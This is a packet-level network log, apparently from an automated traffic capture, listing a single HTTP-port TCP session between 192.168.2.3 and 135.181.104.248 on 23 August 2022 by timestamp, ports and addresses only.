Aug 23, 2022 03:43:01.159272909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159285069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159308910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159322977 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159404039 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159419060 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159584999 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159605026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159615040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159624100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159642935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159643888 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159657001 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159662008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159678936 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159679890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159698963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159703970 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159712076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159718990 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159732103 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159738064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159758091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159791946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159846067 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159873962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159877062 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159883022 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159888029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159892082 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.159930944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159949064 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.159970999 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160007954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160008907 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160031080 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160041094 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160058975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160095930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160111904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160135984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160166025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160197020 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160219908 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160238028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160255909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160270929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160274982 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160314083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160315037 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160332918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160332918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160352945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160373926 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160394907 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160397053 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160413980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160448074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160468102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160478115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160552025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160562038 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160581112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160645962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160657883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160665989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160701036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160743952 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160756111 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160758972 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160800934 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160819054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160837889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160862923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160871029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160895109 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160917997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160929918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160963058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.160973072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.160983086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161003113 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161046982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161067009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161084890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161117077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161149025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161149979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161170006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161192894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161206007 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161226988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161257029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161276102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161288023 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161319017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161336899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161348104 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161382914 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161393881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161402941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161433935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161468029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161515951 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161518097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161551952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161578894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161613941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161614895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161659002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161676884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161689997 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161705971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161729097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161771059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161793947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161828995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161848068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161849976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161865950 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161876917 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161884069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161904097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161972046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.161987066 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.161990881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162009954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162012100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162019014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162024975 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162029028 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162090063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162091970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162112951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162132025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162151098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162170887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162201881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162239075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162250042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162260056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162278891 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162297964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162300110 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162336111 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162364960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162391901 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162393093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162451029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162477016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162480116 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162511110 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162528992 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162544012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162576914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162591934 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162596941 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162625074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162657976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162678957 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162707090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162801027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162854910 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.162878990 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162911892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162956953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.162961960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163027048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163033962 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163041115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163048983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163068056 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163080931 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163094997 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163110971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163110971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163155079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163166046 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163187027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163202047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163248062 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163266897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163305044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163316011 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163336992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163337946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163371086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163388014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163392067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163407087 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163410902 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163415909 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163464069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163480997 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163515091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163541079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163553953 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163572073 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163583994 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163594007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163609028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163633108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163649082 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163676977 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163693905 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163702011 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163728952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163733006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163758993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163768053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163789988 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163795948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163810015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163835049 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163839102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163866043 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163896084 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163923025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.163923979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.163996935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.164036989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.164057970 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.164081097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.164103031 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.164134979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.164361954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.164474010 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.175942898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.175970078 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.175987959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176007986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176027060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176048040 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176059961 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176068068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176088095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176104069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176107883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176124096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176134109 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176184893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176187992 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176206112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176240921 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176239967 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176259041 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176285982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176311970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176347017 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176373005 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176381111 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176388025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176417112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176438093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176443100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176460981 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176497936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176498890 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176598072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176641941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176664114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176685095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176706076 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176724911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176729918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176744938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176764011 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176773071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176784039 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176789999 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176805973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176808119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176826000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.176839113 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176856995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.176867962 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177016973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177037954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177078009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177097082 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177097082 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177150965 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177156925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177179098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177212954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177229881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177258015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177273989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177294016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177314043 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177354097 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177372932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177381992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177402973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177438021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177455902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177458048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177491903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177510977 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177520037 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177551985 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177561998 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177567005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177587986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177620888 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177623034 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177666903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177689075 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177709103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177730083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177755117 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177764893 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177783012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177783012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177793980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177805901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177826881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177845955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177846909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177860975 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177871943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177886009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177892923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177936077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177957058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177977085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.177989960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.177997112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178014040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178051949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178059101 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178112984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178160906 CEST	80	49812	135.181.104.248	192.168.2.3
